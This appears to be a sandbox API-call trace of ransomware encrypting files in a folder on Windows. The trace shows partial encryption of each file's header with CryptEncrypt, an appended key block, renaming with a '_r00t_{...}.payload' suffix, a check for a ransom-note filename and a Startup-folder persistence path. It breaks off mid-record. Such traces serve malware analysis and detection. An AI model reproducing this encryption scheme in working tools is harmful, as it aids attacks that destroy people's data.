[0063.169] GetTickCount () returned 0x1150348 [0063.169] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0063.169] GetProcessHeap () returned 0x5e0000 [0063.169] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0063.169] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.171] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.171] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.171] GetProcessHeap () returned 0x5e0000 [0063.172] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0063.172] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.172] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.172] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.172] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.172] CloseHandle (hObject=0x430) returned 1 [0063.195] GetProcessHeap () returned 0x5e0000 [0063.195] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0063.195] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi_r00t_{nhhHyu}.payload") returned 64 [0063.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi_r00t_{nhhhyu}.payload")) returned 1 [0063.195] GetProcessHeap () returned 0x5e0000 [0063.195] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0063.195] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x13148, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Setup.exe", cAlternateFileName="")) returned 1 [0063.196] lstrcmpiW (lpString1="Setup.exe", lpString2="Windows") returned -1 [0063.196] lstrcmpiW (lpString1="Setup.exe", lpString2="$Recycle.bin") returned 1 [0063.196] lstrcmpiW (lpString1="Setup.exe", lpString2="System Volume Information") returned -1 [0063.196] lstrcmpiW (lpString1="Setup.exe", lpString2="Program Files") returned 1 [0063.196] lstrcmpiW (lpString1="Setup.exe", lpString2="Program Files (x86)") returned 1 [0063.196] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe") returned 35 [0063.196] StrStrIW (lpFirst="Setup.exe", lpSrch=".payload") returned 0x0 [0063.196] lstrcmpW (lpString1="Setup.exe", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.196] lstrcmpW (lpString1="Setup.exe", lpString2="taridd") returned -1 [0063.196] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0063.196] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0063.196] GetTickCount () returned 0x1150358 [0063.196] GetTickCount () returned 0x1150358 [0063.196] GetTickCount () returned 0x1150358 [0063.196] GetTickCount () returned 0x1150358 [0063.196] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0063.196] GetProcessHeap () returned 0x5e0000 [0063.196] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0063.196] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.198] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.198] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.199] GetProcessHeap () returned 0x5e0000 [0063.199] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0063.199] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.199] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.199] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.199] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.200] CloseHandle (hObject=0x430) returned 1 [0063.202] GetProcessHeap () returned 0x5e0000 [0063.202] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0063.202] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe_r00t_{nhhHyu}.payload") returned 57 [0063.202] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\setup.exe_r00t_{nhhhyu}.payload")) returned 1 [0063.202] GetProcessHeap () returned 0x5e0000 [0063.202] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0063.202] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0xc5158, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupEngine.dll", cAlternateFileName="SETUPE~1.DLL")) returned 1 [0063.202] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="Windows") returned -1 [0063.202] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="$Recycle.bin") returned 1 [0063.202] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="System Volume Information") returned -1 [0063.202] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="Program Files") returned 1 [0063.202] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="Program Files (x86)") returned 1 [0063.202] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll") returned 41 [0063.203] StrStrIW (lpFirst="SetupEngine.dll", lpSrch=".payload") returned 0x0 [0063.203] lstrcmpW (lpString1="SetupEngine.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.203] lstrcmpW (lpString1="SetupEngine.dll", lpString2="taridd") returned -1 [0063.203] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0063.203] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0063.203] GetTickCount () returned 0x1150367 [0063.203] GetTickCount () returned 0x1150367 [0063.203] GetTickCount () returned 0x1150367 [0063.203] GetTickCount () returned 0x1150367 [0063.203] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0063.203] GetProcessHeap () returned 0x5e0000 [0063.203] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0063.203] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.241] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.246] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.257] GetProcessHeap () returned 0x5e0000 [0063.257] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0063.257] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.257] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.259] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.259] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.259] CloseHandle (hObject=0x430) returned 1 [0063.279] GetProcessHeap () returned 0x5e0000 [0063.279] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0063.279] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll_r00t_{nhhHyu}.payload") returned 63 [0063.279] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll_r00t_{nhhhyu}.payload")) returned 1 [0063.279] GetProcessHeap () returned 0x5e0000 [0063.279] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0063.280] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x48150, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupUi.dll", cAlternateFileName="")) returned 1 [0063.280] lstrcmpiW (lpString1="SetupUi.dll", lpString2="Windows") returned -1 [0063.280] lstrcmpiW (lpString1="SetupUi.dll", lpString2="$Recycle.bin") returned 1 [0063.280] lstrcmpiW (lpString1="SetupUi.dll", lpString2="System Volume Information") returned -1 [0063.280] lstrcmpiW (lpString1="SetupUi.dll", lpString2="Program Files") returned 1 [0063.280] lstrcmpiW (lpString1="SetupUi.dll", lpString2="Program Files (x86)") returned 1 [0063.280] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll") returned 37 [0063.280] StrStrIW (lpFirst="SetupUi.dll", lpSrch=".payload") returned 0x0 [0063.280] lstrcmpW (lpString1="SetupUi.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.280] lstrcmpW (lpString1="SetupUi.dll", lpString2="taridd") returned -1 [0063.280] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0063.280] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0063.280] GetTickCount () returned 0x11503b5 [0063.280] GetTickCount () returned 0x11503b5 [0063.280] GetTickCount () returned 0x11503b5 [0063.280] GetTickCount () returned 0x11503b5 [0063.280] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0063.280] GetProcessHeap () returned 0x5e0000 [0063.280] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0063.280] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.282] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.282] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.283] GetProcessHeap () returned 0x5e0000 [0063.283] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0063.283] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.283] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.284] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.284] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.284] CloseHandle (hObject=0x430) returned 1 [0063.290] GetProcessHeap () returned 0x5e0000 [0063.290] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0063.290] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll_r00t_{nhhHyu}.payload") returned 59 [0063.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\setupui.dll_r00t_{nhhhyu}.payload")) returned 1 [0063.291] GetProcessHeap () returned 0x5e0000 [0063.291] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0063.291] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5381000, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x5381000, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x5381000, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x75a8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupUi.xsd", cAlternateFileName="")) returned 1 [0063.291] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="Windows") returned -1 [0063.291] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="$Recycle.bin") returned 1 [0063.291] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="System Volume Information") returned -1 [0063.291] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="Program Files") returned 1 [0063.291] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="Program Files (x86)") returned 1 [0063.291] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd") returned 37 [0063.291] StrStrIW (lpFirst="SetupUi.xsd", lpSrch=".payload") returned 0x0 [0063.291] lstrcmpW (lpString1="SetupUi.xsd", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.291] lstrcmpW (lpString1="SetupUi.xsd", lpString2="taridd") returned -1 [0063.291] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0063.291] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0063.291] GetTickCount () returned 0x11503b5 [0063.291] GetTickCount () returned 0x11503b5 [0063.291] GetTickCount () returned 0x11503b5 [0063.291] GetTickCount () returned 0x11503b5 [0063.291] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0063.292] GetProcessHeap () returned 0x5e0000 [0063.292] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0063.292] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.294] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.294] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.294] GetProcessHeap () returned 0x5e0000 [0063.294] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0063.294] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.294] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.294] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.294] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.294] CloseHandle (hObject=0x430) returned 1 [0063.333] GetProcessHeap () returned 0x5e0000 [0063.333] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0063.333] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd_r00t_{nhhHyu}.payload") returned 59 [0063.333] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd_r00t_{nhhhyu}.payload")) returned 1 [0063.333] GetProcessHeap () returned 0x5e0000 [0063.333] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0063.333] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6519be00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0x6519be00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0x6519be00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x17758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupUtility.exe", cAlternateFileName="SETUPU~1.EXE")) returned 1 [0063.334] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="Windows") returned -1 [0063.334] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="$Recycle.bin") returned 1 [0063.334] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="System Volume Information") returned -1 [0063.334] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="Program Files") returned 1 [0063.334] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="Program Files (x86)") returned 1 [0063.334] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe") returned 42 [0063.334] StrStrIW (lpFirst="SetupUtility.exe", lpSrch=".payload") returned 0x0 [0063.334] lstrcmpW (lpString1="SetupUtility.exe", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.334] lstrcmpW (lpString1="SetupUtility.exe", lpString2="taridd") returned -1 [0063.334] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0063.334] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0063.334] GetTickCount () returned 0x11503e4 [0063.334] GetTickCount () returned 0x11503e4 [0063.334] GetTickCount () returned 0x11503e4 [0063.334] GetTickCount () returned 0x11503e4 [0063.334] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0063.334] 